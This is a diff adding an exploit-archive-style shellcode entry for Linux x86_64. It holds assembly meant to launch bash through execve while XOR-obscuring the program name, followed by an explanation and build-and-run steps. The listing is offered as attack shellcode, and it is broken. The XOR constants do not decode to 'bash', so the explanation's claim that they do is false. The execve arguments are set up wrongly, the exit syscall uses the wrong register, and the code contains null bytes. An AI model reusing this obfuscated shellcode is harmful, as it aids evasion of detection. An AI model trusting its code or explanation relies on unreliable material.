+1,68 @@ +Exploit Title: Linux/x86_64 - bash shellcode with xor encoding +Date: 05/02/2023 +Exploit Author: Jeenika Anadani +Contact: https://twitter.com/cyber_jeeni +Category: Shellcode +Architectue: Linux x86_64 +Shellcode Length: 71 Bytes + +----------------------- +section .data + +section .text + global _start + +_start: + ; set up argv and envp arrays for execve() + xor rax, rax + mov [rsp-8], rax + mov qword [rsp-16], 0x72613162 ; encrypted 'bash' + xor byte [rsp-16], 0x08 + xor byte [rsp-15], 0x16 + xor byte [rsp-14], 0x24 + xor byte [rsp-13], 0x32 + lea rdx, [rsp-16] + mov qword [rsp-24], rdx + mov qword [rsp-32], rdx + lea rdi, [rsp-32] + + ; call execve() + xor eax, eax + mov al, 59 + syscall + + ; exit with status code 0 + xor eax, eax + mov ebx, eax + mov al, 60 + syscall + +----------- +#### Explanation: + +This code uses XOR encryption to obscure the name of the program being executed, `"bash"`. The XOR encryption key is `0x08162432`, which is applied to each byte of the string. The decryption is performed just before calling `execve`, so the program name is passed in its original form. + +The rest of the code is the same as the previous example, making a system call to the `execve` function and then calling the `exit` syscall to terminate the process. + +--------- +### Compilation AND Execution: + +To run the x86_64 assembly code on a Linux system, you need to assemble it into an executable file and then run the file. Here are the steps: + +1. Save the code to a file with a `.asm` extension, for example `bash.asm`. + +2. Assemble the code into an object file using an assembler, such as NASM: + `nasm -f elf64 -o bash.o bash.asm` +The `-f elf64` option specifies that the output format should be ELF64 (Executable and Linkable Format), and the `-o` option specifies the name of the output file, `bash.o`. + +3. Link the object file to produce an executable file using the `ld` linker: + `ld -s -o bash bash.o` +The `-s` option removes the symbol table from the output file to make it smaller, and the `-o` option specifies the name of the output file, `bash`. + +4. Make the file executable: + `chmod +x bash` + +5. Finally, you can run the file: + `./bash` + +--------------------- \ No newline at end of file